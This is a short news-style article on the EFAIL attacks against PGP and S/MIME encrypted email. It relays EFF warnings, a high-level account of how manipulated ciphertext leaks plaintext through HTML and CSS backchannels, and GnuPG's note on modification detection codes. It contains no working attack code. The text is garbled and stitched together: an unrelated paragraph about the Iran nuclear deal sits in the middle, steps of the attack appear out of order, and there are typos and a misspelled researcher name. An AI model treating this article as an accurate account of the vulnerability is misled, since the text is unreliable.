Encrypted Emails At Risk From Two New Attacks


According to security researcher and professor Sebastian Schninzel of FH Münster, PGP and S/MIME email encryption contains a flaw that allows for the plaintext form to be recovered. Unfortunately, guarding messages from an attacker with full access to your data is one of the primary use cases for both encryption formats. "EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages". From there, the actor manipulates the ciphertext of the email.

Cluley also highlighted that because Efail attacks rely on past encrypted emails being sent to the target, it is a visible and obvious attack method that could be easily identified using a script that scans incoming email for malformed IMG tags.

The vulnerabilities in PGP and S/MIME standards pose an "immediate risk" to email communication including the potential exposure of the contents of past messages, said the Electronic Frontier Foundation, a USA digital rights group. They do note, however, that disabling HTML rendering won't completely stop EFAIL attacks. Efforts to make email safer haven't seen widespread adoption because these solutions are "hacks" on top of legacy infrastructure, causing an error prone and clunky user experience. The organization provided step-by-step guides explaining how to do just that in Apple Mail, Outlook, and Thunderbird, which are the most popular clients affected by EFAIL.

'If you use PGP/GPG or S/MIME for very sensitive communication, you should disable it in your email client for now'.

The researchers used CBC/CFB gadgets "to enject malicious plaintext snippets into encrypted emails that abuse existing and standard conforming backchannels, for example, in in HTML, CSS, or x509 functionality, to exfiltrate the full plaintext after decryption".

Iran nuclear deal: Envoy starts diplomatic tour after United States withdrawal
Iran wants the Europeans and others to give it clear-cut guarantees about fulfilling their obligations if Tehran remains in the deal.

The attacker manages to get hold of an encrypted email. Service providers have been requested by the EFF to communicate the news to all users and request them to disable all related security plugins including Thunderbird with Enigmail, Apple mail with GPG tools, Outlook with GPG4win.

It is also possible to decrypt emails with PGP decryption tools separate from email programs.

EFF said in a blog post that users should uninstall PGP until the flaw is patched.

Werner Koch, principle author at Gnu Privacy Guard, which is a free implementation of the OpenPGP standard, opened a discussion on the issue in which he said that the attack should not work if authenticated encryption (GnuPG's is called modification detection code, or MDC) is in use, which is the preferred configuration.

Email is no longer a secure communication medium.